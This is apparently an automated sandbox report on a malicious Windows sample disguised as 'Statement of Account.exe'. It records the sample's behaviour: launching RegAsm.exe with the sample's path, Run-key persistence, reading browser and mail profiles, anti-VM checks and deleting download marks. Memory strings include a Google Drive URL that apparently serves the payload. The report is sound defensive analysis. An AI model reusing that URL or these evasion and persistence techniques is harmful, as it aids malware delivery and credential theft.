            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1D7B73609_2_1D7B7360
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1D7B9CA09_2_1D7B9CA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1D7B5E689_2_1D7B5E68
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1D7B1A479_2_1D7B1A47
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1D7B24B89_2_1D7B24B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1E275E089_2_1E275E08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1E274ACC9_2_1E274ACC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1E275D209_2_1E275D20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1E276AF19_2_1E276AF1
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeCode function: 14_2_00143DFE14_2_00143DFE
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeCode function: 16_2_000D3DFE16_2_000D3DFE
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: String function: 0040177E appears 94 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 01286A80 appears 52 times
            Source: C:\Users\user\Desktop\Statement of Account.exeProcess Stats: CPU usage > 98%
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess Stats: CPU usage > 98%
            Source: Statement of Account.exe, 00000001.00000002.47853705109.000000000041C000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameedderfu.exe vs Statement of Account.exe
            Source: Statement of Account.exe, 00000001.00000002.47854997401.0000000002AC0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameedderfu.exeFE2X vs Statement of Account.exe
            Source: Statement of Account.exeBinary or memory string: OriginalFilenameedderfu.exe vs Statement of Account.exe
            Source: Statement of Account.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Users\user\Desktop\Statement of Account.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeSection loaded: edgegdi.dllJump to behavior
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe C066AEE7AA3AA83F763EBC5541DAA266ED6C648FBFFCDE0D836A13B221BB2ADC
            Source: Statement of Account.exeReversingLabs: Detection: 23%
            Source: Statement of Account.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Statement of Account.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\Desktop\Statement of Account.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Statement of Account.exe 'C:\Users\user\Desktop\Statement of Account.exe'
            Source: C:\Users\user\Desktop\Statement of Account.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Statement of Account.exe'
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe 'C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe'
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe 'C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe'
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Statement of Account.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Statement of Account.exe' Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Roaming\DnDcRJump to behavior
            Source: classification engineClassification label: mal100.rans.spre.troj.adwa.spyw.evad.winEXE@8/6@3/3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4976:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1544:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4976:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3088:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3088:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1544:304:WilStaging_02
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Binary string: RegAsm.pdb source: DnDcR.exe, DnDcR.exe.9.dr
            Source: Binary string: RegAsm.pdb4 source: DnDcR.exe, 0000000E.00000002.48160223360.0000000000142000.00000002.00020000.sdmp, DnDcR.exe, 00000010.00000002.48240148335.00000000000D2000.00000002.00020000.sdmp, DnDcR.exe.9.dr

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: 00000001.00000002.47854626661.0000000002260000.00000040.00000001.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 1_2_00404E6E push esp; retf 1_2_00404E8E
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 1_2_00407C85 push C8F569B9h; ret 1_2_00407C8A
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 1_2_00403E8E push esi; retf 1_2_00403E95
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 1_2_0226020A push 02417304h; ret 1_2_0226020F
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 1_2_02260E76 push edx; iretd 1_2_02260E77
            Source: C:\Users\user\Desktop\Statement of Account.exeCode function: 1_2_02262076 push ebp; retf 1_2_02262077
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0133261F push edi; retn 0000h9_2_01332621
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeCode function: 14_2_00144289 push es; retf 14_2_00144294
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeCode function: 14_2_001444A3 push es; retf 14_2_001444A4
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeCode function: 14_2_00144469 push cs; retf 14_2_0014449E
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeCode function: 16_2_000D4289 push es; retf 16_2_000D4294
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeCode function: 16_2_000D4469 push cs; retf 16_2_000D449E
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeCode function: 16_2_000D44A3 push es; retf 16_2_000D44A4
            Source: initial sampleStatic PE information: section name: .text entropy: 6.81553512761
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DnDcRJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DnDcRJump to behavior

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe:Zone.Identifier read attributes | deleteJump to behavior
            Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Tries to detect Any.runShow sources
            Source: C:\Users\user\Desktop\Statement of Account.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Users\user\Desktop\Statement of Account.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: Statement of Account.exe, 00000001.00000002.47853987549.00000000005F4000.00000004.00000020.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEY
            Source: Statement of Account.exe, 00000001.00000002.47854827996.0000000002A50000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32USERPROFILE=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLL
            Source: Statement of Account.exe, 00000001.00000002.47854827996.0000000002A50000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.52055392488.0000000001500000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: RegAsm.exe, 00000009.00000002.52055392488.0000000001500000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32USERPROFILE=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1KLPTPDRT8A5OLFK0QZPESH4W5UTNFBMH
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1536Thread sleep time: -2767011611056431s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe TID: 5204Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe TID: 3624Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 9924Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Statement of Account.exeSystem information queried: ModuleInformationJump to behavior
            Source: Statement of Account.exe, 00000001.00000002.47856062180.00000000047D9000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.52058245869.0000000002FB9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
            Source: RegAsm.exe, 00000009.00000002.52055783599.00000000015E8000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW$e
            Source: Statement of Account.exe, 00000001.00000002.47856062180.00000000047D9000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.52058245869.0000000002FB9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: RegAsm.exe, 00000009.00000002.52055392488.0000000001500000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32USERPROFILE=https://drive.google.com/uc?export=download&id=1Klptpdrt8A5OlfK0qzPEsH4W5UtnfbMh
            Source: RegAsm.exe, 00000009.00000002.52058245869.0000000002FB9000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
